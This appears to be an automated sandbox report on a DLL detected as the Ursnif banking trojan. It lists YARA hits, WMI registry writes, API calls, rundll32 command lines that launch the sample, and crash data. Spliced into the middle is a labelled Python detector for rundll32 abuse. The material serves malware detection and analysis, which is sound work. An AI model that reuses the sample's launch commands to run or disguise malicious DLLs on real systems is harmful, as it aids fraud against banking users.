                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527327468.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576012668.000000000542B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531480606.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527187841.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.659429998.00000000037AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531370717.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527048423.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531284421.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531412078.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531686708.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531172047.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.570679066.00000000039AB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.624467221.000000000532D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667937639.000000000522F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526903678.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.531440376.00000000055A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527256439.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.526968624.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.527017763.0000000003B28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6316, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e710000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2dca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2a0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.265a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e7a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.143a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.697257309.0000000004D39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.488040276.0000000002650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.696204071.0000000003579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491247065.0000000001430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.453838951.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.476882523.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: m87xfb63XU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7121B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03032B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03034C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E725600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E75D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E773CCE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E75B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E77FA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E76A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E77FB98
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E74E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E725600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E75D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E773CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E75B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E76A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E74E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E74ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E74ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E711273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7115C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7113B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7123D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03035D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0303B149 NtQueryVirtualMemory,
                      Source: m87xfb63XU.dllVirustotal: Detection: 18%
                      Source: m87xfb63XU.dllReversingLabs: Detection: 22%
                      Source: m87xfb63XU.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 640
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 640
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
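                      Added example, not part of this report: a detector for the rundll32 pattern in the process events above, run over process-creation events constructed from this report's process tree. The event shape (a dict with pid/ppid/image/cmdline) is a hypothetical normalised form, not any product's schema. Note that loaddll32.exe is the sandbox's own loader harness, so the cmd.exe wrapper and the three export-name launches (BeGrass, Fieldeight, Often) are analyst-driven; what carries over to production telemetry is rundll32.exe being given an explicit export of a DLL that lives in a user-writable path, and WerFault.exe then reporting on that same rundll32 PID, which is how a DLL entered through an export it was not designed for shows up. The report does not say which export launch received PID 4668, 4596 or 4348, only that WerFault targeted those PIDs, so that mapping and the WerFault PIDs are assumed here.

```python
import re

# Constructed process-creation events mirroring this report's process tree.
# PIDs 6316 (loaddll32), 4524 (cmd) and 4536 (rundll32 ,#1) are the report's;
# which export-name launch got PID 4668, 4596 or 4348 is NOT stated in the
# report (only that WerFault targeted them), so that mapping and the WerFault
# PIDs 7001-7003 are assumed. The last event is a benign control case.
EVENTS = [
    {"pid": 6316, "ppid": 1, "image": r"C:\Windows\System32\loaddll32.exe",
     "cmdline": r"loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll'"},
    {"pid": 4524, "ppid": 6316, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1"},
    {"pid": 4536, "ppid": 4524, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1"},
    {"pid": 4668, "ppid": 6316, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass"},
    {"pid": 4596, "ppid": 6316, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight"},
    {"pid": 4348, "ppid": 6316, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often"},
    {"pid": 7001, "ppid": 4668, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632"},
    {"pid": 7002, "ppid": 4596, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 640"},
    {"pid": 7003, "ppid": 4348, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 640"},
    {"pid": 8000, "ppid": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# rundll32 <dll>,<export>  where the export is a name or an ordinal (#N)
RUNDLL32_RE = re.compile(
    r"rundll32(?:\.exe)?\s+'?(?P<dll>[^',]+?\.dll)'?\s*,\s*(?P<export>#?\w+)", re.I)
WERFAULT_PID_RE = re.compile(r"-p\s+(\d+)")
# Directories an unprivileged user can write to; System32/SysWOW64 never match.
USER_WRITABLE_RE = re.compile(r"^[A-Za-z]:\\(?:Users|ProgramData|Windows\\Temp)\\", re.I)


def parse_rundll32(cmdline):
    """Return (dll_path, export) for a rundll32 command line, or None."""
    m = RUNDLL32_RE.search(cmdline)
    return (m.group("dll"), m.group("export")) if m else None


def detect(events):
    """Flag rundll32 running an explicit export of a DLL from a user-writable
    path, and any WerFault report whose -p target is one of those rundll32 PIDs."""
    findings, flagged = [], {}
    for ev in events:
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name == "rundll32.exe":
            parsed = parse_rundll32(ev["cmdline"])
            if parsed and USER_WRITABLE_RE.match(parsed[0]):
                dll, export = parsed
                flagged[ev["pid"]] = (dll, export)
                findings.append({"rule": "rundll32_user_path_export",
                                 "pid": ev["pid"], "dll": dll, "export": export})
        elif name == "werfault.exe":
            m = WERFAULT_PID_RE.search(ev["cmdline"])
            if m and int(m.group(1)) in flagged:
                target = int(m.group(1))
                dll, export = flagged[target]
                findings.append({"rule": "flagged_loader_crashed", "pid": ev["pid"],
                                 "target_pid": target, "dll": dll, "export": export})
    return findings


def exports_invoked(events, dll_name):
    """Distinct exports invoked on one DLL. Several in quick succession is the
    signature of a loader harness (loaddll32.exe here) trying every export,
    not of the malware itself; one export per host is the in-the-wild shape."""
    seen = set()
    for ev in events:
        parsed = parse_rundll32(ev["cmdline"])
        if parsed and parsed[0].lower().endswith("\\" + dll_name.lower()):
            seen.add(parsed[1])
    return seen


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
    print("exports invoked:", sorted(exports_invoked(EVENTS, "m87xfb63XU.dll")))
```

The crash rule is deliberately tied to a prior rundll32 hit: WerFault on its own fires constantly on a fleet, and rundll32 with a System32 DLL (the control event) never matches because the path filter is on the DLL, not on rundll32's own location.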
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER933.tmp
                      Source: classification engine | Classification label: mal96.troj.evad.winDLL@14/12@16/7
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_03034A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4596
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4668
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4348
                      Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
                      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts (6 occurrences)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK (3 occurrences)
                      Source: m87xfb63XU.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: m87xfb63XU.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.515702652.00000000052D6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.542683798.0000000004EA1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb1 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000000F.00000003.536214635.0000000004E83000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb4 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbHa source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000F.00000003.536214635.0000000004E83000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdbK source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb) source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.533606421.0000000000D92000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.553574266.0000000000832000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.568560433.0000000000C92000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbt source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbH source: WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.542887533.0000000003126000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdbb source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb? source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK` source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
